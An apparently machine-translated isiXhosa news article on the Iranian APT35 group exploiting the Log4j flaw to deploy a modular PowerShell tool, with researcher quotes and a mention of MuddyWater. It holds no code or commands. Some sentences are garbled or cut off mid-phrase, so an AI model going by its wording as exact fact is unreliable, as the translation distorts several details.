Iqela labahlaseli baxhaphaza ubuthathaka be-Apache Log4j

ilog4j

Iindaba zavakala mva nje Iqela le-hacker elixhaswa ngurhulumente wase-Iran lichongiwe eyiphi bayaxhaphaza ubuthathaka kwi apachelog4j ukuhambisa isixhobo esitsha semodyuli ye-PowerShell.

Icaciswe ngabaphandi kwiCheck Point Software Technologies, Iqela le-APT35 hacker, ekwaziwa ngokuba yiPhosphorous and Charming Kitten, yaqala ukuchongwa ixhaphaza i-Log4j kwiintsuku nje ezine emva kokuba sesichengeni sokuqala kubhengezwe.

Ukuseta uhlaselo ichazwa njengengxamile ukusukela kwiqela isetyenziswe kuphela isiseko somthombo ovulekileyo wekhithi yokuxhaphaza ye-JNDI.

Ukufumana ukufikelela kwinkonzo esengozini, abasebenzisi Abahlaseli baseIran babandakanya isakhelo esitsha semodyuli esekwe kwiPowerSheleyayibizwa "CharmPower". Iscript sisetyenziselwa ukuseka ukuzingisa, ukuqokelela ulwazi, kunye nokuqhuba imiyalelo.

CharmPower ineemodyuli eziphambili ezine:

  • Eyokuqala iqinisekisa uqhagamshelwano lwenethiwekhi
  • Owesibini uqokelela ulwazi olusisiseko lwenkqubo, njengenguqulelo yeWindows, igama lekhompyuter, kunye nomxholo weefayile ezahlukeneyo zesistim.
  • Imodyuli yesithathu ichaza umyalelo kunye nolawulo lwe-domain efunyenwe kwi-URL ekhowudiweyo egcinwe kwi-Amazon Web Services Inc S3 ibhakethi.
  • Ngelixa imodyuli yokulandela ifumana, ikhuphela kwaye iphumeze iimodyuli zokulandela umkhondo.

Ngokutsho ulwazi oluqokelelweyo ngokuphunyezwa kokuqala, APT35 ngoko sebenzisa iimodyuli ezongezelelweyo zesiko ukwenza lula ukubiwa kwedatha kunye nokufihla ubukho babo kumatshini osulelekileyo.

I-APT35 liqela le-hacker elaziwayo elidityaniswe nokuhlaselwa kwe-2020 ngokuchasene nephulo likaTrump, amagosa akhoyo kunye nangaphambili ase-US aseburhulumenteni, iintatheli ezigubungela ezopolitiko zehlabathi, kunye nabase-Irani abaziwayo abahlala ngaphandle kwe-Iran. Eli qela lalikwajolise kwiNkomfa yoKhuseleko yaseMunich kwangaloo nyaka.

"Uphando oludibanisa ukuxhaphaza kwe-Log4Shell kwi-Iranian Charming Kitten APT ihambelana, kwaye iyangqubana, nengxelo eyenziwe yi-Cybersecurity Infrastructure and Security Agency yase-US ngoJanuwari 10 ecebisa ukuba khange kubekho kungenelelo lubalulekileyo olunxulumene ne-bug ngelo xesha. ixesha.”

"Oku kunokuthi kugxininise imiba ekhoyo ngoku ngokubhengezwa kwesiganeko kunye nokungafihli, kunye ne-lag enokubakho phakathi komsebenzi wosongelo womdlali kunye nokufunyanwa.

UJohn Bambenek, umzingeli oyintloko wezoyikiso kwinkampani yolawulo lweenkonzo zetekhnoloji ye-Netenrich Inc., uthe ayimangalisi into yokuba abadlali belizwe benqanaba lesibini babambe eli thuba livezwe bubuthathaka belog4j ngokukhawuleza.

"Nakuphi na oku bukhali kuya kusetyenziswa nguye nabani na okhangela indawo ekhawulezayo, kwaye ngamanye amaxesha iifestile ezinobuchule ezifana nezi ziyavuleka, oku kuthetha ukuba kufuneka usebenze ngokukhawuleza," utshilo uBambenek. "Umbuzo omkhulu ngowokuba yeyiphi i-arhente yezobuntlola ebiyisebenzisa le nto phambi kokuba ubungozi buvezwe esidlangalaleni."

Isiphene seLog4j, eyaziwa ngokuba I-Log4Shell kwaye ilandelwa njenge-CVE-2021-44228, sisisongelo esikhulu ngenxa yobubanzi ukusetyenziswa kweshishini Log4j kunye ne-plethora yeeseva kunye neenkonzo ezisekwe kwilifu obunokuthi buvezwe ubuthathaka bohlobo lwe-zeroday. I-Log4j, isixhobo esivulekileyo nesisasazwe ngokubanzi kwi-Apache Software Foundation, sisixhobo sokugawulwa kwemithi kwaye isiphene sichaphazela inguqulo ye-2.0 nge-2.14.1.

iingcali zokhuseleko baye bathi isoyikiso esenziwe yi-Log4Shell siphezulu kakhulu kungekuphela ngenxa yobubanzi yokusetyenziswa kwesixhobo, kodwa nangenxa yokulula enokuthi isetyenziswe ngayo ukuba sesichengeni. Abadlali besoyikiso kufuneka bangenise kuphela umtya oqulethe ikhowudi ekhohlakeleyo, ethi iLog4j ihlalutye kwaye ifake kwaye ilayishe kwiseva. Abahlaseli banokufumana ulawulo lwe

Iindaba zokuba abahlaseli baseIran baxhaphaza ubuthathaka be-Log4j beza njengoko i-US Cyber ​​​​Command's National Cyber ​​​​Mission Mission Force iveze ukuba ichonge izixhobo ezininzi ezivulelekileyo ezisetyenziswa ziiarhente zobuntlola zaseIran kuthungelwano lothungelwano.

Isibhengezo sinxulumene neqela le-hacker elixhaswa ngurhulumente wase-Iran elibizwa ngokuba "yi-MuddyWater."

Eli qela linxulunyaniswe noMphathiswa wezobuNtlola kunye noKhuseleko lwase-Iran kwaye lijolise ikakhulu kwezinye izizwe ezikuMbindi Mpuma kwaye ngamanye amaxesha amazwe aseYurophu nakuMntla Melika.

Ukuba ufuna ukwazi ngakumbi ngayo, ungajonga iinkcukacha Kule khonkco ilandelayo.


Shiya uluvo lwakho

Idilesi yakho ye email aziyi kupapashwa. ezidingekayo ziphawulwe *

*

*

  1. Inoxanduva lwedatha: I-AB Internet Networks 2008 SL
  2. Injongo yedatha: Ulawulo lwe-SPAM, ulawulo lwezimvo.
  3. Umthetho: Imvume yakho
  4. Unxibelelwano lwedatha: Idatha ayizukuhanjiswa kubantu besithathu ngaphandle koxanduva lomthetho.
  5. Ukugcinwa kweenkcukacha
  6. Amalungelo: Ngalo naliphi na ixesha unganciphisa, uphinde uphinde ucime ulwazi lwakho.